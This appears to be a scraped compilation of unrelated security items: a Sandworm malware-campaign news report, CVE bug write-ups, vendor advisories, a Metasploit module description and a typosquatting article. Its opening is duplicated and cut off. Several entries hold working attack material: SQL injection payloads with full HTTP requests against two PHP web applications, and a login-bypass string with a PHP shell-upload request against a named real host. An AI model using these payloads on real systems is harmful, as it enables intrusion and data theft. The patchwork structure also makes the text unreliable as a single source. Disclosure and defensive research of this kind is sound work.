A threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show.
Recorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as Colibri loader and Warzone RAT.
The

A threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show.

Recorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as Colibri loader and Warzone RAT.

The attacks are said to be an expansion of the same campaign that previously distributed DCRat (or DarkCrystal RAT) using phishing emails with legal aid-themed lures against providers of telecommunications in Ukraine.

Sandworm is a destructive Russian threat group that's best known for carrying out attacks such as the 2015 and 2016 targeting of Ukrainian electrical grid and 2017's NotPetya attacks. It's confirmed to be Unit 74455 of Russia's GRU military intelligence agency.

The adversarial collective, also known as Voodoo Bear, sought to damage high-voltage electrical substations, computers and networking equipment for the third time in Ukraine earlier this April through a new variant of a piece of malware known as Industroyer.

Russia's invasion of Ukraine has also had the group unleash numerous other attacks, including leveraging the Follina vulnerability (CVE-2022-30190) in the Microsoft Windows Support Diagnostic Tool (MSDT) to breach media entities in the Eastern European nation.

In addition, it was uncovered as the mastermind behind a new modular botnet called Cyclops Blink that enslaved internet-connected firewall devices and routers from WatchGuard and ASUS.

The U.S. government, for its part, has announced up to $10 million in rewards for information on six hackers associated with the APT group for participating in malicious cyber activities against critical infrastructure in the country.

"A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113's broadening but continuing use of publicly available commodity malware," Recorded Future said.

The attacks entail the fraudulent domains hosting a web page purportedly about "Odesa Regional Military Administration," while an encoded ISO image payload is stealthily deployed via a technique referred to as HTML smuggling.

HTML smuggling, as the name goes, is an evasive malware delivery technique that leverages legitimate HTML and JavaScript features to distribute malware and get around conventional security controls.

Recorded Future also said it identified points of similarities with another HTML dropper attachment put to use by the APT29 threat actor in a campaign aimed at Western diplomatic missions between May and June 2022.

Embedded within the ISO file, which was created on August 5, 2022, are three files, including an LNK file that tricks the victim into activating the infection sequence, resulting in the deployment of both Colibri loader and Warzone RAT to the target machine.

The execution of the LNK file also launches an innocuous decoy document – an application for Ukrainian citizens to request for monetary compensation and fuel discounts – in an attempt to conceal the malicious operations.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Russian Sandworm Hackers Impersonate Ukrainian Telecoms to Distribute Malware

Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the booking_id parameter at /admin/budget.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: Ptanly

vendor: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/admin/budget.php?booking\_id=

Vulnerability url: http://ip/Wedding-Management-PHP/admin/budget.php?booking\_id=

\[+\] Payload: /Wedding-Management-PHP/admin/budget.php?booking\_id=31%20and%20length(database())%20=9&user\_id=31 // Leak place ---> booking\_id

dbname = dbwedding,length is 9

GET /Wedding\-Management\-PHP/admin/budget.php?booking\_id\=31%20and%20length(database())%20\=9&user\_id\=31 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

When length (database ()) = 8 

When length (database ()) = 9

CVE-2022-38509: bug_report/SQLi-1.md at main · ptanly/bug_report

WD Discovery software executable files were signed with an unsafe SHA-1 hashing algorithm. An attacker could use this weakness to create forged certificate signatures due to the use of a hashing algorithm that is not collision-free. This could thereby impact the confidentiality of user content. This issue affects: Western Digital WD Discovery WD Discovery Desktop App versions prior to 4.4.396 on Mac; WD Discovery Desktop App versions prior to 4.4.396 on Windows.

**Last Updated:** September 20, 2022

**Description**

WD Discovery Desktop App Version 4.4.396 includes updates to help improve the security of your WD software.

Users can download the latest version from the WD Discovery Downloads page or by following the instructions on the WD Discovery: Online User Guide.

**Advisory Summary**

WD Discovery versions prior to 4.4.396 were installing a Windows 7-compatible driver on Windows 10 systems that prevented the Windows 10 Memory Integrity option from being enabled. Memory integrity is a feature of core isolation that prevents malicious code from accessing high-security processes in the event of an attack. WD Discovery version 4.4.396 addresses this issue by replacing the driver with one that is compatible with Memory Integrity. In either case, old or new driver, there was no impact to normal hard drive operation.

**Reported By:** Western Digital would like to thank Aaron LeMieux of Microsoft for reporting this issue.

WD Discovery software executable files were signed with an unsafe SHA-1 hashing algorithm. This has been updated to the SHA-256 hashing algorithm to support secure code signing.

**CVE Number:** CVE-2022-29835

CVE-2022-29835: WDC-22014 - WD Discovery Desktop App Version 4.4.396 | Western Digital

Interview Management System v1.0 was discovered to contain a SQL injection vulnerability via the component /interview/delete.php?action=deletecand&id=.

**Interview Management System v1.0 by janobe has SQL injection**

BUG\_Author: yuanqiu

Login account: janobe@janobe.com/janobe (Super Admin account)

vendors: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /interview/delete.php?action=deletecand&id=

Vulnerability location: /interview/delete.php?action=deletecand&id=, id

dbname =sourcecodester\_interviewdb

\[+\] Payload: /interview/delete.php?action=deletecand&id=(updatexml(1,concat(0x7e,(select%20database()),0x7e),0)) // Leak place ---> id

GET /interview/delete.php?action\=deletecand&id\=(updatexml(1,concat(0x7e,(select%20database()),0x7e),0)) HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

CVE-2022-38576: bug_report/SQLi-1.md at main · gith-boot/bug_report

VIAVIWEB Wallpaper Admin suffers from remote shell upload and remote SQL injection vulnerabilities.

    ```# Exploit Title: [VIAVIWEB Wallpaper Admin - Multiple vulnrabilities]# Google Dork: intext:"Wallpaper Admin"   "LOGIN" "password" "Username"# Date: [18/09/2022]# Exploit Author: [Edd13Mora]# Vendor Homepage: [www.viaviweb.com]# Version: [N/A]# Tested on: [Windows 11 - Kali Linux]------------------SQLI on the Login page------------------payload --> admin' or 1=1-- ----POC:---[1] Disable JavaScript on ur browser put the payload and submit[2] Reactive JavaScript and resend the request---------------------------Authenticated SQL Injection:---------------------------Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]-----------------------------------------------Remote Code Execution (RCE none authenticated):-----------------------------------------------Poc:----Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes--------------------Burp Request :--------------------POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2Host: http://googlezik.freehostia.comCookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848Content-Length: 467Origin: http://googlezik.freehostia.comReferer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yesUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers-----------------------------33893919268150571572221367848Content-Disposition: form-data; name="category_id"1-----------------------------33893919268150571572221367848Content-Disposition: form-data; name="image[]"; filename="poc.php"Content-Type: image/png<?php phpinfo(); ?>-----------------------------33893919268150571572221367848Content-Disposition: form-data; name="submit"-----------------------------33893919268150571572221367848--Uploaded File can be found here :--------------------------------http://localhost/PAth-Where-Script-Installed/categories/```

VIAVIWEB Wallpaper Admin SQL Injection / Shell Upload

A potential unathenticated file deletion vulnerabilty on Trend Micro Mobile Security for Enterprise 9.8 SP5 could allow an attacker with access to the Management Server to delete files.

This issue was resolved in 9.8 SP5 Critical Patch 2.

CVE-2022-40980

Due to a reliance on client-side authentication, the WiFi Mouse (Mouse Server) from Necta LLC's authentication mechanism is trivially bypassed, which can result in remote code execution.

This PR adds a new module to exploit an auth bypass to rce in 'wifi mouse'.  
Leaving it draft right now, talking to @todb / @todb-r7 about a possible CVE for it.

@H4rk3nz0 looks like you were the original author (and your twitter is gone), did you ever reach out to the company to responsibly disclose?

This is a neat exploit as you connect to the server, ask it to open cmd, then type out what you want on the user's screen. its fun to watch shell code :). Wrote in a cmdstager method, but due to the payload length and it appearing on the user's screen, its unreliable (needs ~3.5min of solitude). If the user types anything or moves the focus to another window, exploit will fail. wrote second method which uses what the original exploit does to host the payload on a web server and just download it. MUCH faster and more reliable.

**Verification**

*   install and start software. i tried it on the one linked in EDB and the most recent one on the website
*   Start msfconsole
*   use exploit/windows/misc/wifi_mouse_rce
*   Set rhost and lhost as required.
*   run
*   **Verify** it works via both methods (targets)
*   **Document** looks good

CVE-2022-3218: wifi mouse rce by h00die · Pull Request #16985 · rapid7/metasploit-framework

Adobe Bridge version 12.0.2 (and earlier) and 11.1.3 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Updates Available for Adobe Bridge | APSB22-49

Bulletin ID

Date Published

Priority

APSB22-49

September 13, 2022  

3

**Summary**

Adobe has released a security update for Adobe Bridge. This update addresses critical and important vulnerabilities that could lead to arbitrary code execution and memory leak.

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Bridge    

12.0.2 and earlier versions   

Windows  and macOS

Adobe Bridge    

11.1.3 and earlier versions 

Windows  and macOS  

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app's update mechanism.  For more information, please reference this help page.   

Product

Version

Platform

Priority     

Availability      

Adobe Bridge    

12.0.3

Windows and macOS    

3

Download Page    

Adobe Bridge    

11.1.4   

Windows and macOS      

3

Download Page      

**Vulnerability details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**  

**CVSS vector**

CVE Numbers

Out-of-bounds Write (CWE-787)  

Arbitrary code execution

Critical   

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-35699

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-35700

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical   

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35701  

Out-of-bounds Read (CWE-125)

Arbitrary code execution  

Critical   

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35702  

Out-of-bounds Read (CWE-125)

Arbitrary code execution  

Critical    

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35703  

Use After Free (CWE-416)  

Arbitrary code execution  

Critical    

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35704  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35705  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35706  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35707  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-35708  

Use After Free (CWE-416)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-35709  

Use After Free (CWE-416)  

Memory leak  

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-38425  

**Acknowledgments**

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:    

*   Mat Powell of Trend Micro Zero Day Initiative - CVE-2022-35699, CVE-2022-35700, CVE-2022-35701, CVE-2022-35702, CVE-2022-35703, CVE-2022-35704, CVE-2022-35705, CVE-2022-35706, CVE-2022-35707, CVE-2022-35708, CVE-2022-35709, CVE-2022-38425
    

**Revisions**

December 6th, 2021: Added CVE details for CVE-2021-44185, CVE-2021-44186, CVE-2021-44187   

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com

CVE-2022-35699: Adobe Security Bulletin

The folioupdate service in Fabasoft Cloud Enterprise Client 22.4.0043 allows Local Privilege Escalation.

################################################################################ # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ################################################################################ # # Product: Fabasoft Cloud Enterprise Client # Vendor: Fabasoft # CSNC ID: CSNC-2022-010 # CVE ID: CVE-2022-29908 # Subject: Local Privilege Escalation # Risk: High # Effect: Locally exploitable # Authors: Tino Kautschke # Date: 14.09.2022 # ################################################################################ Introduction: ------------- The Fabasoft Cloud lets you create a digital business network for your company based on relationships of trust – for secure cross-company, transnational collaboration in the cloud. Fabasoft provides a native client that allows, for example, editing documents directly via the web client or synchronizing documents on the device. \[1-3\] Compass Security identified a local privilege escalation vulnerability, allowing a user on a system with the Fabasoft Cloud Enterprise Client installed, to escalate their privileges to local administrator. Affected: --------- Vulnerable: \* Fabasoft Cloud Enterprise Client 22.4.0043 No other version was tested, but it is possible for older versions to be vulnerable. Not vulnerable: \* Fabasoft Cloud Enterprise Client 22.4.0045 Other products were affected (Windows only) \[4\]: Fabasoft Folio / Fabasoft eGov-Suite 2021 UR3, Fabasoft Folio / Fabasoft eGov-Suite 2022, Fabasoft Business Process Cloud Technical Description: ---------------------- The Fabasoft Cloud Enterprise Client uses an update service named FabasoftCloudUS.exe, which is executed with SYSTEM privileges. On update, it looks for new update files in C:\\ProgramData\\fabasoft.plugin, which can be read and written to by arbitrary users. The update service expects a signed MSI file and an empty file with extension '.pending' in this folder to start the update process. The validation check for signed MSI files is vulnerable. It is possible to sign an arbitrary MSI package with a self-signed certificate containing Fabasoft's information in the certificate fields. The validation check will accept the self-signed MSI package and start the setup process with SYSTEM privileges. This means that an unprivileged user can execute arbitrary MSI packages, thus resulting in code execution with full SYSTEM permissions. This can be, e.g., exploited by executing a reverse shell or other malicious commands. Workaround / Fix: ----------------- The validation process for signed MSI files should be revised to ensure that it is not possible to install packages from untrusted sources. A patch has already been released by the publisher. \[4\] The update service should not run in a high privileged context like SYSTEM. It is recommended to set up a dedicated service user with neccessary privileges only. As a customer using the Fabasoft Cloud Enterprise Client, update your installation to the latest version. Workaround: disable Fabasoft Folio Client Update Service "folioupdate". Timeline: --------- 2022-04-13: Discovery by Tino Kautschke 2022-04-13: Initial vendor notification 2022-04-21: Fabasoft public announcement and release of fixed version 2022-04-29: Vulnerability registered as CVE-2022-29908 2022-09-14: Coordinated disclosure of the advisory References: ----------- \[1\] https://help.cloud.fabasoft.com/index.php?topic=doc/User-Help-Fabasoft-Cloud-eng/introduction.htm \[2\] https://help.cloud.fabasoft.com/index.php?topic=doc/Fabasoft-Cloud-Client/introduction.htm \[3\] https://help.cloud.fabasoft.com/index.php?topic=doc/Technical-Information-eng/the-fabasoft-cloud-enterprise-client.htm \[4\] https://www.fabasoft.com/en/support/knowledgebase/client-autoupdate-harmful-code-installation-vulnerability-fsc33251

CVE-2022-29908

Categories: News
Tags: typosquatting

Tags:  sniffies

Tags:  extensions

Tags:  fake av

Tags:  screen locker

Tags:  advertising

Tags:  PUP.Optional.AdMax

A researcher found a list of over 50 shady domains based on spelling variations of the brand name Sniffies.



(Read more...)




The post Hookup site targeted by typo-squatters appeared first on Malwarebytes Labs.

Posted: September 19, 2022 by

Ethical hacker and security researcher Kody Kinzie shared with BleepingComputer a list of over 50 domains of which many are spelling variations of the brand name Sniffies.

Sniffies identifies itself as a “modern, map-based, meetup app for gay, bi, and curious guys.”

Kody used an open source tool called DNSTwist to generate a list of lookalike domains for Sniffies.com. Out of the 3531 possibilities generated by the tool, 51 represented valid domains.

"I saw a good amount of domains registered with the same MX server set up, even though the domains were hosted on random platforms."

A mail exchanger record (MX record) specifies the mail server responsible for accepting email messages on behalf of a domain name. So that would imply that the domains were set up by the same threat-actor.

**Typosquatting**

Typosquatting is a term you may have seen when reading about Internet scams. In essence it relies on users making typing errors (typos) when entering a site or domain name. Sometimes it is also referred to as URL hijacking or domain mimicry, but IMHO the word typosquatting more accurately describes the matter. As you will understand, the success of a typosquat scammer depends on the number of victims that are likely to misspell the intended domain and land on the scammers’ pages.

One factor is the popularity of the domain. With an estimated number of 79,600 visitors per day, Sniffies certainly qualifies in that department.

**Advertising**

BleepingComputer’s test results were described as:

“Once accessed, the illicit 'Sniffies' copycat domains do one of the following things:

*   Push the user to install dubious Chrome extensions
*   Launch the 'Music' App on Apple devices right from the web browser
*   Lead the users to bogus technical 'support' scam sites
*   Lead the users to fake job posting sites"

Obviously, we did some testing of our own. We found some domains that had either been abandoned or parked for the future, but some did what they were set up for—redirect visitors based on some basic system properties and the location (based on IP address).

Most of the redirects we found at Malwarebytes went to advertising sites that were more or less legitimate. But certainly not what the user would be looking for. Many shared this look, offering the visitor a few choices.

In one instance (Dutch IP, Windows system) we were redirected to a fake Microsoft Defender warning site (including soundtrack and locked screen), parked in the domain ondigitalocean.app which has been on Malwarebytes’ radar for some time.

We also found one of the Chrome extensions that BleepingComputer described as dubious. Malwarebytes detects these extensions as PUP.Optional.AdMax.

**Mitigation**

While it’s certainly nice to read how these campaigns work and how the research was done, Sniffies is just an example of what is out there.

To avoid falling victim to typosquatters, there are a few basic measures you can take, which are in essence aimed at not typing the url.

*   Bookmark your favorites
*   Use search results rather than typing the url in the address bar
*   Leave some or all of the sites that you visit every day open in your browser tabs (most popular browsers offer the option to continue where you left off or to specify a set of sites to start with)
*   Never click links in unexpected emails or on unknown sites
*   Use an antivirus or anti-malware solution that offers web protection and preferably even an anti-exploit solution.

Stay safe, everyone!

**RELATED ARTICLES**

Tag

#windows